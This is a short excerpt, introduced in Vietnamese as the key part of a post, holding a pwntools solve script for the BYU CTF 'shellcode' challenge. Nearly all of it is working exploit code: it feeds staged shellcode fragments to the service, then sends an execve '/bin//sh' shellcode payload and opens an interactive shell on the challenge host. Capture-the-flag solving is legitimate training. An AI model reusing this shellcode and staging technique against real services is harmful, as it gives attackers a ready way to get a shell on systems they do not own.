Phần mấu chốt của bài:
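# pwntools solve script for the BYU CTF "shellcode" challenge.
# The service prompts for four 10-byte shellcode fragments and then reads one
# more payload; the fragments and the final payload are exactly those the
# author documented inline below.
#
# Target selection uses pwntools' `args`: run as `python3 solve.py REMOTE` to
# connect to byuctf.xyz:40017, otherwise a local ./shellcode process is used.
from pwn import *

elf = context.binary = ELF("./shellcode")

# The original spawned a local process with elf.process() and then immediately
# rebound `r` to the remote socket, leaving the local child running with its
# handle dropped. Open exactly one target instead.
if args.REMOTE:
    r = remote("byuctf.xyz", 40017)
else:
    r = elf.process()
# Debugger hook, only meaningful for the local process (kept as the author left it).
#gdb.attach(r,'''b*main+341\nc\nb*0x777777000\nc''')

# NOTE: sendlineafter() appends b"\n" to each fragment, so every stage delivers
# len(data) + 1 bytes into its 10-byte slot (6 bytes for the first stage).
r.sendlineafter(b"Enter first 10 bytes of shellcode:", b"\x48\x89\xD6\x0F\x05") #0x7fffffffde90 : mov [rsp] --> rdx : execve sys_read
r.sendlineafter(b"Enter second 10 bytes of shellcode:", b"\x00") #<--- mov 10 byte to 0x777777000 + 20
r.sendlineafter(b"Enter third 10 bytes of shellcode:", b"\x00") #<--- mov 10 byte to 0x777777000 + 40
r.sendlineafter(b"Enter last 10 bytes of shellcode:", b"\x00") #<-- mov 10 byte to 0x777777000 + 60

# Final payload: 5 bytes of padding, the author's 3-byte prefix, then the
# shellcode blob (the bytes b"/bin//sh" are visible inside it).
shellcode = b"\x48\x31\xFF\x57\x48\xBF\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x57\x48\x31\xF6\x48\x31\xD2\x48\x89\xE7\x48\x31\xC0\x48\x83\xC0\x3B\x0F\x05"
payload = b"A" * 5 #<--- padding
payload += b"\x48\x31\xF6" #<--- clear [rsi]: 0x777777000
payload += shellcode #<--- sendshellcode to exploit
r.sendline(payload)
r.interactive()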